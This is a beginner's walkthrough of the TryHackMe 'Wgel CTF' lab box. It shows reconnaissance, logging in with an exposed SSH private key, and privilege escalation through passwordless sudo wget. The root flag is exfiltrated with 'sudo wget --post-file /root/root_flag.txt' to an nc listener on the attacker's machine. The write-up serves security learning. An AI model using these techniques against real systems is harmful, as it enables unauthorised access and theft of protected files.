Machine Info
Machine link: WgelCTF on TryHackMe This is an easy box for beginners (like me as of writing this post).
Objectives
Get the user flag and root flag.
User flag
Once we deploy the machine, give it a taste of nmap
.
1
2
3
4
5
6
7
8
9
10
$ nmap 10.10.27.47
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-17 21:28 EST
Nmap scan report for 10.10.27.47
Host is up (0.24s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 29.36 seconds
Just a simple machine with simple ports. Going to http://10.10.27.47:80 give us the default apache page:
However reading the source code reveals this one line:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
<pre>/etc/apache2/
|-- apache2.conf
| `-- ports.conf
|-- mods-enabled
| |-- *.load
| `-- *.conf
|-- conf-enabled
| `-- *.conf
|-- sites-enabled
| `-- *.conf
<!-- Jessie don't forget to udate the webiste -->
</pre>
Jessie must be a person (or perhaps an account) working on the machine. Other than that, this default page does not have anything else interesting. Next I scanned web page with a tool like dirb
or dirbuster
. I found a page with the url /sitemap, which appears to be a template for an e-commerce site, after reading everything on the page and it’s immediate subpages, I found nothing, surprisingly!
I skipped a day and caved in, after reading some other great writeups I got the id_rsa
file inside /sitemap/.ssh
. No idea why it’s there, but I got it anyway.
An id-rsa
file contains a secret key used for SSH authentication, further info here. We can use it to access the machine, but we still need a username. As you probably recall, 2 paragraphs ago, I said that Jessie may be a user on the machine. It takes nothing to try, right?
1
2
3
4
5
6
7
8
9
10
11
12
$ ssh -i id_rsa jessie@10.10.27.47
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-45-generic i686)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
8 packages can be updated.
8 updates are security updates.
jessie@CorpOne:~$
Unsurprisingly, it works. Running a few other commands can get us halfway there, I hope. Finding the user flag:
1
2
3
4
jessie@CorpOne:~$ find | grep flag
./Documents/user_flag.txt
jessie@CorpOne:~$ cat ./Documents/user_flag.txt
057c67131c3d5e42dd5cd30censored
A simple find
and we got it.
Root flag
Let’s see if we can run anything with sudo on this machine:
1
2
3
4
5
6
7
8
jessie@CorpOne:~$ sudo -l
Matching Defaults entries for jessie on CorpOne:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User jessie may run the following commands on CorpOne:
(ALL : ALL) ALL
(root) NOPASSWD: /usr/bin/wget
Well well well, gotcha! We can run wget
with root privilege. wget
is a tool for downloading and uploading file through http, https or ftp. For this we need a server to receive incoming requests, nc
will do fine
On our machine, run nc
:
1
2
$ nc -lvp 10000
listening on [any] 10000 ...
On the other machine, run wget
with the --post-file
param:
1
2
3
4
jessie@CorpOne:~$ sudo wget --post-file /root/root_flag.txt [yourmachineIP]:10000
--2020-12-18 04:52:51-- http://[yourmachineIP]:10000/
Connecting to [yourmachineIP]:10000... connected.
HTTP request sent, awaiting response...
On our machine, we receive the following request:
1
2
3
4
5
6
7
8
9
10
POST / HTTP/1.1
User-Agent: Wget/1.17.1 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: [yourmachineIP]:10000
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 33
b1b968b37519ad1daa6408188censored